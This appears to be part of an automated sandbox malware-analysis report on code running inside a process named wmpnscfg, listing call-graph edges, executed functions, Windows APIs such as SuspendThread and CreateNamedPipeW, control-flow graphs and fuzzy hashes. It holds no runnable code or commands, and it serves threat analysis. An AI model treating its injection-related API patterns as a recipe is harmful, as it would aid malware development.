34517->34518 34518->34516 34520 7df488de12e8 VirtualProtect 34519->34520 34522 7df488de12f7 34519->34522 34520->34522 34521 7df488de1395 34521->34514 34522->34521 34523 7df488de1371 VirtualProtect 34522->34523 34523->34522 34524 2614efd262c 34525 2614efd265f 34524->34525 34527 2614efd2680 Thread32First 34525->34527 34531 2614efd2738 34525->34531 34526 2614efd288e 34528 2614efd2685 34527->34528 34530 2614efd272f CloseHandle 34528->34530 34529 2614efd2771 SuspendThread 34529->34531 34530->34531 34531->34526 34531->34529 34532 2614efd698c 34533 2614efd69a6 34532->34533 34534 2614efd69b0 34533->34534 34535 2614efd69ab LoadLibraryA 34533->34535 34535->34534 34536 2614efdbc28 34537 2614efdbc2d 34536->34537 34539 2614efdbc56 34536->34539 34540 2614efdba4c 34537->34540 34541 2614efdba6d 34540->34541 34542 2614efdbb44 CreateWindowExW 34541->34542 34543 2614efdbba1 34541->34543 34542->34543 34543->34539 34544 2614efd2908 34545 2614efd295b 34544->34545 34546 2614efd291a 34544->34546 34546->34545 34547 2614efd293d ResumeThread 34546->34547 34547->34546 34548 2614efdd004 34549 2614efdd057 34548->34549 34556 2614efdaef0 34549->34556 34551 2614efdd07f CreateNamedPipeW 34552 2614efdd0c7 34551->34552 34555 2614efdd109 34551->34555 34553 2614efdd0e0 BindIoCompletionCallback 34552->34553 34554 2614efdd0f8 ConnectNamedPipe 34553->34554 34553->34555 34554->34555 34557 2614efdaf2c 34556->34557 34560 2614efe2e84 34557->34560 34559 2614efdaf34 34559->34551 34561 2614efe2e98 NtAcceptConnectPort 34560->34561 34562 2614efe2eb2 34560->34562 34561->34562 34562->34559

                                                                                                                    Executed Functions

                                                                                                                    Function 00007DF488D81958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                    • String ID: H$H
                                                                                                                    • API String ID: 874015164-136785262
                                                                                                                    • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                    • Instruction ID: 80abb4429dc1e3b20264389fff371bae6e53e656dce81ea4b771a6b692694546
                                                                                                                    • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                    • Instruction Fuzzy Hash: 92B1437061CB888FDB54EF18D885AAAB7E5FBD4301F005A2EE58BC3251DB34E5458B86
                                                                                                                    Function 000002614EFE3218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 2614efe3218-2614efe3274 call 2614efd49e4 3 2614efe42bb-2614efe42e1 call 2614efe49f0 0->3 4 2614efe327a-2614efe32db call 2614efd6dfc * 3 call 2614efd32fc call 2614efd6dfc 0->4 18 2614efe42a8-2614efe42a9 4->18 19 2614efe32e1-2614efe3bf4 4->19 22 2614efe42ad-2614efe42b6 call 2614efd4a40 18->22 20 2614efe3d49-2614efe3d51 19->20 21 2614efe3bfa-2614efe3c05 19->21 24 2614efe3d53-2614efe3d58 20->24 25 2614efe3dc4-2614efe3dd5 20->25 21->20 26 2614efe3c0b-2614efe3c19 21->26 22->3 24->25 30 2614efe3d5a-2614efe3d64 RtlFormatCurrentUserKeyPath 24->30 28 2614efe3e2e-2614efe3e34 25->28 29 2614efe3dd7-2614efe3def 25->29 31 2614efe3c1f-2614efe3c27 26->31 32 2614efe3d44-2614efe3d45 26->32 34 2614efe3e5f-2614efe3e72 28->34 35 2614efe3e36-2614efe3e37 28->35 29->28 45 2614efe3df1-2614efe3df9 29->45 30->25 33 2614efe3d66-2614efe3d77 30->33 31->32 36 2614efe3c2d-2614efe3c45 31->36 32->20 38 2614efe3d79-2614efe3d85 33->38 39 2614efe3d92-2614efe3d9a 33->39 34->18 51 2614efe3e78-2614efe3e83 34->51 40 2614efe3e39-2614efe3e58 35->40 41 2614efe3c4b-2614efe3c4c 36->41 42 2614efe3d38-2614efe3d3c 36->42 60 2614efe3dbb-2614efe3dbc 38->60 61 2614efe3d87-2614efe3d90 38->61 46 2614efe3d9c-2614efe3db8 call 2614efd1000 39->46 40->40 47 2614efe3e5a-2614efe3e5b 40->47 48 2614efe3c4f-2614efe3c5f 41->48 44 2614efe3d3e-2614efe3d3f 42->44 44->32 52 2614efe3e0b 45->52 53 2614efe3dfb-2614efe3e09 45->53 46->60 47->34 50 2614efe3c71-2614efe3c73 48->50 56 2614efe3c75-2614efe3c7a 50->56 57 2614efe3c61-2614efe3c6f 50->57 51->18 58 2614efe3e89-2614efe3e97 51->58 52->28 59 2614efe3e0d-2614efe3e28 52->59 53->28 62 2614efe3c80 56->62 63 2614efe3d05-2614efe3d08 56->63 57->50 58->18 64 2614efe3e9d-2614efe3ea5 58->64 59->28 60->25 61->46 65 2614efe3c82-2614efe3c89 62->65 67 2614efe3d0a-2614efe3d0e 63->67 68 2614efe3d15-2614efe3d24 63->68 64->18 66 2614efe3eab-2614efe3ecb calloc 64->66 71 2614efe3c8b-2614efe3c9f 65->71 72 2614efe3ca3-2614efe3ccf 65->72 66->18 73 2614efe3ed1-2614efe3ef5 66->73 67->68 69 2614efe3d10-2614efe3d11 67->69 68->48 70 2614efe3d2a-2614efe3d36 68->70 69->68 70->44 71->65 74 2614efe3ca1 71->74 75 2614efe3cf7-2614efe3cf8 72->75 76 2614efe3cd1-2614efe3ce5 call 2614efe4a1c 72->76 77 2614efe3efb-2614efe3f0e 73->77 78 2614efe4014-2614efe404f 73->78 74->63 81 2614efe3cfd-2614efe3cfe 75->81 76->75 86 2614efe3ce7-2614efe3cf5 76->86 80 2614efe3f10-2614efe3f1a 77->80 89 2614efe40a7-2614efe40b7 78->89 90 2614efe4051-2614efe4052 78->90 83 2614efe3f20-2614efe3f24 80->83 84 2614efe3fe5-2614efe3ff7 80->84 81->63 83->84 87 2614efe3f2a-2614efe3f74 call 2614efe4a30 83->87 84->80 88 2614efe3ffd-2614efe4012 84->88 86->81 100 2614efe3f88-2614efe3f8a 87->100 88->78 89->18 99 2614efe40bd-2614efe40d3 89->99 91 2614efe4054-2614efe405c 90->91 93 2614efe405e-2614efe4063 91->93 94 2614efe4089-2614efe409d 91->94 93->94 97 2614efe4065-2614efe406e 93->97 94->91 98 2614efe409f-2614efe40a0 94->98 103 2614efe4071-2614efe4074 97->103 98->89 104 2614efe4149-2614efe414f 99->104 105 2614efe40d5-2614efe40d6 99->105 101 2614efe3f8c-2614efe3fa2 100->101 102 2614efe3f76-2614efe3f86 100->102 106 2614efe3fa4-2614efe3fac 101->106 107 2614efe3fe1 101->107 102->100 108 2614efe407d-2614efe4087 103->108 109 2614efe4076 103->109 110 2614efe4151-2614efe4155 104->110 111 2614efe41a2-2614efe41a9 104->111 112 2614efe40d8-2614efe40e3 105->112 106->107 115 2614efe3fae 106->115 107->84 108->94 108->103 109->108 116 2614efe415c-2614efe4167 110->116 113 2614efe41af-2614efe41cf call 2614efd32fc 111->113 114 2614efe4256-2614efe4258 111->114 117 2614efe40e5-2614efe40f2 112->117 118 2614efe40f4-2614efe4108 112->118 133 2614efe41e4-2614efe41f8 call 2614efd32fc 113->133 134 2614efe41d1-2614efe41e2 call 2614efd35b8 113->134 122 2614efe425a-2614efe4264 114->122 123 2614efe4284-2614efe428d 114->123 121 2614efe3fb0-2614efe3fc9 call 2614efe4a1c 115->121 124 2614efe4189-2614efe41a0 116->124 125 2614efe4169-2614efe4175 116->125 117->118 132 2614efe410c-2614efe411b 117->132 118->104 120 2614efe410a 118->120 120->112 141 2614efe3fcb-2614efe3fd1 121->141 142 2614efe3fd5-2614efe3fdb 121->142 122->123 129 2614efe4266-2614efe4280 122->129 123->22 130 2614efe428f-2614efe42a6 call 2614efd6e0c call 2614efd563c 123->130 124->111 124->116 125->124 131 2614efe4177-2614efe417e 125->131 129->123 130->22 131->124 137 2614efe4180-2614efe4187 131->137 138 2614efe411d-2614efe413a 132->138 139 2614efe413c 132->139 133->114 152 2614efe41fa-2614efe420b call 2614efd35b8 133->152 134->133 151 2614efe420d-2614efe4223 call 2614efe2804 134->151 137->124 147 2614efe4141-2614efe4143 138->147 139->147 141->121 146 2614efe3fd3 141->146 142->107 146->107 147->104 147->123 151->114 158 2614efe4225-2614efe4235 151->158 152->114 152->151 158->114 160 2614efe4237-2614efe4250 158->160 160->114
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentFormatPathUsercalloc
                                                                                                                    • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                    • API String ID: 4207655178-84560671
                                                                                                                    • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                    • Instruction ID: d364304488aedd4f8de1622c055663f56ad25ebb5748fa1ed35091ac8a1cf402
                                                                                                                    • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                    • Instruction Fuzzy Hash: 75A2BCB0519B888FD375DF18D8887ABB7E4FB99711F040A2ED48EC3251EB71A551CB82
                                                                                                                    Function 00007DF488D81CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2456578531.00007DF488D81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D81000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_7df488d81000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 167522227-2547889144
                                                                                                                    • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                    • Instruction ID: a7deac42614c01e8e75cb4aa1f461f3790b7f88132f477f6fd6ee9b38d2b4638
                                                                                                                    • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                    • Instruction Fuzzy Hash: 3C91B37161CA8D8FEB95EB24D8956AB73E1FF94301F00892AD54FC3191DF78E8089782
                                                                                                                    Function 0000026150A61F40 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 426memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000003.2437478846.0000026150A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026150A60000, based on PE: true
                                                                                                                    • Associated: 00000010.00000003.2413111002.0000026150A60000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_3_26150a60000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$HeapVirtual
                                                                                                                    • String ID: c
                                                                                                                    • API String ID: 3783212868-112844655
                                                                                                                    • Opcode ID: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                    • Instruction ID: dda3c4094225f7b2c5471f9e33f4f840f582c60e6b0e26a24449ee21215a9b88
                                                                                                                    • Opcode Fuzzy Hash: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                    • Instruction Fuzzy Hash: AC023372A04AE086D7648F69D8587ADBBF1F3C4786F888012DBAB43754EE3AD954C740
                                                                                                                    Function 000002614EFDD004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2502124517-0
                                                                                                                    • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                    • Instruction ID: d988a192e07f85bddc4ec55c08a15c80bc868c508c59b956b18799f0be22f6cb
                                                                                                                    • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                    • Instruction Fuzzy Hash: 30317E30208A088FE795EF28E898BAA7BE5FB94320F540729E45BC31D0DF35D955CB81
                                                                                                                    Function 00007DF488D92E90 Relevance: 4.5, APIs: 3, Instructions: 40nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946281568.00007DF488D91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488D91000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488d91000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQuerySystem$malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1603438391-0
                                                                                                                    • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                    • Instruction ID: b5a9d41dabe993db2d9f2caace3dd3094132458729da9655bdfc71e32e878f5a
                                                                                                                    • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                    • Instruction Fuzzy Hash: 09011934619945CFE798EB29EC58AA6B7E1FBE4301F548029A44BC21A0DE38D509CB42
                                                                                                                    Function 000002614EFE3158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 287 2614efe3158-2614efe3171 288 2614efe317b-2614efe317e 287->288 289 2614efe3173-2614efe3176 287->289 291 2614efe3180-2614efe3185 288->291 292 2614efe318a-2614efe319f 288->292 290 2614efe320e-2614efe3216 289->290 291->290 293 2614efe31ab-2614efe31da 292->293 294 2614efe31a1-2614efe31a5 292->294 295 2614efe31dc-2614efe31e8 NtAcceptConnectPort 293->295 296 2614efe31ea 293->296 294->293 297 2614efe31ef-2614efe31f1 295->297 296->297 298 2614efe320c 297->298 299 2614efe31f3-2614efe31fd 297->299 298->290 300 2614efe31ff-2614efe3203 299->300 301 2614efe3205 299->301 302 2614efe320a 300->302 301->302 302->298
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 0-4108050209
                                                                                                                    • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                    • Instruction ID: 8353700f27b6aabe767feba7f40ccea8f0335570c6bc160c4aec647d6423c02d
                                                                                                                    • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                    • Instruction Fuzzy Hash: 402127707079488FE750DE9DA8CC33A76E1E799711F54053EE54DC3250DA2AFD588B82
                                                                                                                    Function 000002614EFD262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 390 2614efd262c-2614efd2666 call 2614f01342c 393 2614efd266c-2614efd2680 call 2614f013426 Thread32First 390->393 394 2614efd2738-2614efd273b 390->394 400 2614efd2685-2614efd268a 393->400 396 2614efd288e-2614efd28a1 394->396 397 2614efd2741-2614efd2749 394->397 397->396 399 2614efd274f-2614efd2750 397->399 401 2614efd2752-2614efd276b 399->401 402 2614efd2690-2614efd269a 400->402 403 2614efd2716-2614efd2729 call 2614f013420 400->403 408 2614efd287e-2614efd2888 401->408 409 2614efd2771-2614efd2788 SuspendThread 401->409 402->403 410 2614efd269c-2614efd26a6 402->410 403->400 411 2614efd272f-2614efd2732 CloseHandle 403->411 408->396 408->401 412 2614efd2796-2614efd2798 409->412 410->403 418 2614efd26a8-2614efd26ae 410->418 411->394 413 2614efd279e-2614efd27a2 412->413 414 2614efd2873-2614efd287c 412->414 416 2614efd27b0-2614efd27b1 413->416 417 2614efd27a4-2614efd27ae 413->417 414->408 419 2614efd27b4-2614efd27b6 416->419 417->419 421 2614efd26b0-2614efd26d2 418->421 422 2614efd26d6-2614efd26dc 418->422 419->414 425 2614efd27bc-2614efd27d2 419->425 421->411 431 2614efd26d4 421->431 423 2614efd26de-2614efd26f8 422->423 424 2614efd2705-2614efd2712 422->424 423->411 432 2614efd26fa-2614efd2702 423->432 424->403 426 2614efd27d4-2614efd27e5 425->426 429 2614efd27fe 426->429 430 2614efd27e7-2614efd27ea 426->430 435 2614efd2800-2614efd280a 429->435 433 2614efd27ec-2614efd27f5 430->433 434 2614efd27f7-2614efd27fc 430->434 431->424 432->424 433->435 434->435 436 2614efd280c-2614efd280e 435->436 437 2614efd2862-2614efd286a 435->437 439 2614efd28ad-2614efd28b1 436->439 440 2614efd2814-2614efd2821 436->440 437->426 438 2614efd2870-2614efd2871 437->438 438->414 441 2614efd28bf-2614efd28cc 439->441 442 2614efd28b3-2614efd28bd 439->442 443 2614efd283d 440->443 444 2614efd2823-2614efd282e 440->444 448 2614efd28ce-2614efd28da 441->448 449 2614efd28e9-2614efd28ed 441->449 442->441 445 2614efd283f-2614efd2842 442->445 443->445 446 2614efd2830-2614efd283b 444->446 447 2614efd28a2-2614efd28ab 444->447 445->437 452 2614efd2844-2614efd285b 445->452 446->443 446->444 447->445 450 2614efd28dc-2614efd28e7 448->450 451 2614efd28fb-2614efd2903 448->451 449->443 453 2614efd28f3-2614efd28f6 449->453 450->448 450->449 451->445 452->437 453->445
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleSuspendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1038686644-0
                                                                                                                    • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                    • Instruction ID: 2943668e13609ee74f3e4e085189e3c6d77a5b0fee63741db5d8d1ae2c32a645
                                                                                                                    • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                    • Instruction Fuzzy Hash: 70912730209A058BFB689B98E899A7A7BD1FB45310F58015ED06BC7185DE37E963CBC1
                                                                                                                    Function 00007DF488DC25D4 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946446413.00007DF488DC1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DC1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488dc1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3562636166-0
                                                                                                                    • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                    • Instruction ID: 6f4e925ed33daeaed2e99a5478c7d309e5fee256351c12802d2b4e6d4ae4d424
                                                                                                                    • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                    • Instruction Fuzzy Hash: D7014434628945CFF785EB25DC58B6677E1FBA4301F444429E48BC22A0DF7CD544CB41
                                                                                                                    Function 00007DF488DE22CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2946598852.00007DF488DE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF488DE1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7df488de1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FunctionProtectTableTimerVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2248422592-0
                                                                                                                    • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                    • Instruction ID: e1319112e4dda05af8fc9bd5a18e00a22bc0ab0eb62051b53ff349c99935c6d0
                                                                                                                    • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                    • Instruction Fuzzy Hash: DCE16431A08A598FEB98EF28D8895EA77E2FF98301F54463EE44BC3191DF34E5498741
                                                                                                                    Function 000002614EFDC2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                    • Instruction ID: ac4aa93be2d5fb5c05ced240a1eef3a0f8df08fffe8092ddc2689ad1d169688a
                                                                                                                    • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                    • Instruction Fuzzy Hash: E2223B30618A540ED72DDB1CA8996BA7BD0FB95301F28466ED4EBC3182EE35E517C7C2
                                                                                                                    Function 000002614EFE2EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                    • Instruction ID: 8ff39c1db24391902b4b7898fbed1515086adef7b6a6b578c79f6aeda6376f13
                                                                                                                    • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                    • Instruction Fuzzy Hash: 1481B33061AB498BF7659B5CA44CB7BB3D0FBD5B14F584619E44AC7280EF66F81086C2
                                                                                                                    Function 000002614EFE2CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                    • Instruction ID: 5a5592eaa1b4e6b8a3c7252fe0b5edea9e67f2670b35669be2866048ade745df
                                                                                                                    • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                    • Instruction Fuzzy Hash: 31F0DA74A18B848FEB64EF2CD489B5A77E1FB99710F50451DE84CC3245EF35A8408B86
                                                                                                                    Function 000002614EFE2E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                    • Instruction ID: fdd19aef3ae24a1b26b909e24b80a00955acd3bb66dbfdfc6088ffbda29e44fd
                                                                                                                    • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                    • Instruction Fuzzy Hash: CFE09B712056048FDB00DF98D8C596AB7E0E7D5314F440D69E84ACB164D675E558C682
                                                                                                                    Function 000002614EFE2DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                    • Instruction ID: 2638ab12ab4052262fa334748a8ac9d9c3fa9dcd9442872590fd285399a5fab0
                                                                                                                    • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                    • Instruction Fuzzy Hash: A9D01234A187498BE710AB68954060A7BE1F7DA714F58471CE84483310FA3AE45086C6
                                                                                                                    Function 000002614EFE2D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.2944427451.000002614EFD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002614EFD1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_2614efd1000_wmpnscfg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1658770261-0
                                                                                                                    • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                    • Instruction ID: 08432fb66a0b46d65a436b61e428770a453d21ef78f20870f40a5e7d0304a927
                                                                                                                    • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                    • Instruction Fuzzy Hash: 85D0A734A28B898FEB60FB6C990070637E1F7D6714F954618A448C3214FA2EF45083C7
